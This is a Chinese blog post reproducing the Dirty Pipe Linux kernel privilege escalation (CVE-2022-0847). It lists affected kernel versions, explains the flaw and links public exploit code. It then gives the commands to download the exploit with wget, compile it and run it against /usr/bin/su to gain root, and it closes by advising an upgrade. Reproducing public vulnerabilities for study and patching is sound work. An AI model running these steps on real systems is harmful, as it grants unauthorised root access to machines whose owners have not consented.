【Linux权限提升】CVE-2022-0847复现(二)

漏洞通告:

https://access.redhat.com/security/cve/cve-2022-0847

影响范围:

5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

漏洞介绍:

       发现新管道缓冲区结构的“标志”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧值。非特权本地用户可以使用此漏洞写入由只读文件支持的页面缓存中的页面,从而提升他们在系统上的权限。

漏洞复现:

漏洞exp:(我们这次用1个链接做实验)

1.https://haxx.in/files/dirtypipez.c
2.https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

首先查看内核输入

uname -a

然后输入

sudo wget https://haxx.in/files/dirtypipez.c

进这对dirtypipez.c文件进行编译

gcc -o dirtypipe dirtypipez.c

最后输入西面命令进行权限提升

./dirtypipe /usr/bin/su

解决方案:

       请尽快根据官方升级到安全版本

参考文档:    

最新Linux内核提权漏洞——Dirty Pipe(CVE-2022-0874) 复现
https://access.redhat.com/security/cve/cve-2022-0847
​

      

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值